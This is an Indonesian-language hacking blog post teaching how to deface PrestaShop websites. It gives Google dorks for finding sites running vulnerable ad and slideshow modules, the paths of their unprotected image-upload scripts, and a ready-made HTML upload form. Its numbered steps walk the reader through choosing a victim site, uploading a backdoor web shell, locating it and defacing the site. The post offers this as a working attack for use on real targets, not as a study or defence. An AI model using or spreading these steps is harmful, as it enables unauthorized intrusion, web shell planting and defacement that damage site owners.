Deface Teknik Prestashop File Upload


Hello gengs, kali ini saya Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v

Oke langsung saja , nyari bahan bahan buat di pepes entar pake kata kata mutiara dibawah ini.

Dork : 
   Inurl:"/modules/columnadverts/"
   Inurl:"/modules/homepageadvertise/"
   Inurl:"/modules/productpageadverts/"
   Inurl:"/modules/simpleslideshow/"
   Inurl:"/modules/vtemslideshow/"
   Index Of "/modules/columnadverts/"
   Index Of "/modules/homepageadvertise/"
   Index Of "/modules/productpageadverts/"
   Index Of "/modules/simpleslideshow/"
   Index Of "/modules/vtemslideshow/"

Exploit
 http://loclahost/ modules/columnadverts/uploadimage.php
 http://localhost/ modules/homepageadvertise/uploadimage.php
 http://localhost/ modules/productpageadverts/uploadimage.php
 http://localhost/ modules/simpleslideshow/uploadimage.php
 http://localhost/ modules/vtemslideshow/uploadimage.php

CSRF : 
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>


Langsung Ke Tutorialnya.... :*

1. Cari Target Menggunakan Dork !

2. Pilih Salah Satu Situs Yang Ingin Di buat Pepes :v

3. Tambakan Exploit Setelah Url   :*
 http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !

4. Copy CSRF Yang Ada Di Atas Tadi   :*
Jangan Lupa Edit Dulu CSRF Tersebut .
 Localhost   >  Website Target .
 Modules Name   >   Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML   > All Files

5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu   :*
Jika Berhasil Akan Terlihat Seperti Ini


6. Dan Sekarang Lihat Letak Shell Nya
 http://localhost/modules/modules name/slides/Name_Shell.php

Kalau Sudah Ketemu Shellnya terserah mau dibuat apain, jangan lupa dikasi Makaso biar syedaapp.

Related Posts:


0 Response to "Deface Teknik Prestashop File Upload"

Post a Comment

Labels

Hacking (49) Blogspot (25) Template (18) Web|Blog (13) Android (6) Movies (6)

Link